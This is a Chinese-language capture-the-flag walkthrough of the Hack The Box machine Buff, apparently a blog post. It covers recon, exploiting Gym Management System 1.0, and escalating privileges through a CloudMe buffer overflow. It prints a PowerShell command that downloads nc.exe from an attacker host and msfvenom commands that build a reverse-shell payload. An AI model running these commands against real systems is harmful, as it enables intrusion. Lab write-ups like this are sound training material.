HTB-Buff

在这里插入图片描述

信息收集

nmap
在这里插入图片描述

目录扫描

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
测试了邮件登录是否存在sql注入,是否存在XSS,再查看了源码还有一些可以查看的页面后,收获如下。

  • © Projectworlds.in
  • Gym Management Software 1.0

© Projectworlds.in 应该是一个,额,顾名思义项目世界用来提供项目服务的。

在这里插入图片描述

Gym Management Software 1.0 健身房管理软件,进一步搜索能找到更多信息。

在这里插入图片描述
能找到Gym Management System 1.0

在这里插入图片描述
exploit-db上能找到一些利用。

在这里插入图片描述

前三个需要在/gym/的目录里面某文件上操作,因为我们没有收集到有关这个/gym/目录的信息,只能暂时放弃。
在这里插入图片描述
把第四个下载下来看看。

在这里插入图片描述

开机

使用第四个能获得一个不怎么方便的shell。
在这里插入图片描述

在这里插入图片描述

要么上传个nc.exe来反弹更方便,要么先收集信息然后一步到位到root。

powershell "(new-object System.Net.WebClient).Downloadfile('http://ip:port/nc.exe', 'nc.exe')"

在这里插入图片描述

提权

先收集信息,不着急反弹。

在这里插入图片描述
这本地两个端口运行的什么呢?
在这里插入图片描述
127.0.0.1:3306
在这里插入图片描述

127.0.0.1:8888
在这里插入图片描述
一个一个排除并测试也可以,不过可以考虑再找找有没有什么有用的信息。
在这里插入图片描述

因为这个shell有点不方便,反弹后继续收集信息。
在这里插入图片描述
这个CloudMe_1112.exe的_1112是不是版本1.11.2。
在这里插入图片描述

在这里插入图片描述

选了个最短的试试。
在这里插入图片描述
忽然瞟见一句话。
在这里插入图片描述
以及一个venom,需要我们自己更改。
在这里插入图片描述

先用chisel把端口转过来。
在这里插入图片描述

照着它的修改或者删减一部分。

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=4321 -b '\x00\x0A\x0D' -f python  

但是他生成的负载变量名有些问题。
在这里插入图片描述
在后面加上-v。

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=4321 -b '\x00\x0A\x0D' -f python -v payload

在这里插入图片描述
或者在代码里面改。
在这里插入图片描述

然后执行脚本。
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值